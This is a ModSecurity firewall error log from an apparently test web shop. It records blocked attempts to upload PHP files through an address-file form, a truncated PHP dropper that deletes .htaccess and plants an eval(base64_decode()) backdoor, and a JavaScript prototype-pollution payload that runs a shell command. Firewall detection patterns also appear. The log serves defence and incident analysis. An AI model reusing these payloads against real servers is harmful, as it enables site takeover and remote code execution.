[Tue Jan 20 03:21:00.127741 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.phar"] [unique_id "aW7mjKn2cN71e3MmOdCpLwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.127922 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.phar"] [unique_id "aW7mjKn2cN71e3MmOdCpLwAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.355026 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 7z88364f428d25.php8 found within FILES:custom_attributes[country_id]: 7z88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW7mjKn2cN71e3MmOdCpMAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/z/7z88364f428d25.phar
[Tue Jan 20 03:21:00.356830 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW7mjKn2cN71e3MmOdCpMAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/z/7z88364f428d25.phar
[Tue Jan 20 03:21:00.356998 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aW7mjKn2cN71e3MmOdCpMAAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/7/z/7z88364f428d25.phar
[Tue Jan 20 03:21:00.601457 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Rule 7f5e267b2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.php8"] [unique_id "aW7mjKn2cN71e3MmOdCpMQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.601919 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.php8"] [unique_id "aW7mjKn2cN71e3MmOdCpMQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.604361 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.php8"] [unique_id "aW7mjKn2cN71e3MmOdCpMQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Jan 20 03:21:00.604546 2026] [:error] [pid 1531282] [client 91.84.106.190:59832] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/7/z/7z88364f428d25.php8"] [unique_id "aW7mjKn2cN71e3MmOdCpMQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.347724 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Rule 7f4338bc4be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.phar"] [unique_id "aXBoo8zjI5FSP7JU37J4gAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.348216 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.phar"] [unique_id "aXBoo8zjI5FSP7JU37J4gAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.350737 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.phar"] [unique_id "aXBoo8zjI5FSP7JU37J4gAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.350926 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.phar"] [unique_id "aXBoo8zjI5FSP7JU37J4gAAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.626295 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: bc88364f428d25.php8 found within FILES:custom_attributes[country_id]: bc88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXBoo8zjI5FSP7JU37J4gQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/c/bc88364f428d25.phar
[Wed Jan 21 06:48:19.626958 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXBoo8zjI5FSP7JU37J4gQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/c/bc88364f428d25.phar
[Wed Jan 21 06:48:19.627133 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXBoo8zjI5FSP7JU37J4gQAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/b/c/bc88364f428d25.phar
[Wed Jan 21 06:48:19.937954 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Rule 7f4338bc4be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.php8"] [unique_id "aXBoo8zjI5FSP7JU37J4ggAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.938440 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.php8"] [unique_id "aXBoo8zjI5FSP7JU37J4ggAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.940899 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.php8"] [unique_id "aXBoo8zjI5FSP7JU37J4ggAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Jan 21 06:48:19.941100 2026] [:error] [pid 1552987] [client 213.109.225.211:43712] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/b/c/bc88364f428d25.php8"] [unique_id "aXBoo8zjI5FSP7JU37J4ggAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.338441 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Rule 7fd1995d0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.phar"] [unique_id "aXIK_XQ7hJqieVqeP8FlJgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.338974 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.phar"] [unique_id "aXIK_XQ7hJqieVqeP8FlJgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.341393 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.phar"] [unique_id "aXIK_XQ7hJqieVqeP8FlJgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.341596 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.phar"] [unique_id "aXIK_XQ7hJqieVqeP8FlJgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.529151 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: mt88364f428d25.php8 found within FILES:custom_attributes[country_id]: mt88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXIK_XQ7hJqieVqeP8FlJwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/t/mt88364f428d25.phar
[Thu Jan 22 12:33:17.529824 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXIK_XQ7hJqieVqeP8FlJwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/t/mt88364f428d25.phar
[Thu Jan 22 12:33:17.530002 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXIK_XQ7hJqieVqeP8FlJwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/t/mt88364f428d25.phar
[Thu Jan 22 12:33:17.861451 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Rule 7fd1995d0be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.php8"] [unique_id "aXIK_XQ7hJqieVqeP8FlKAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.861906 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.php8"] [unique_id "aXIK_XQ7hJqieVqeP8FlKAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.864335 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.php8"] [unique_id "aXIK_XQ7hJqieVqeP8FlKAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 12:33:17.864509 2026] [:error] [pid 1574631] [client 194.110.207.198:54148] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/t/mt88364f428d25.php8"] [unique_id "aXIK_XQ7hJqieVqeP8FlKAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Jan 22 16:48:25.058708 2026] [:error] [pid 1574705] [client 46.146.233.94:48044] [client 46.146.233.94] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGycD7n0ZSnusnw3iYfwAAAAY"]
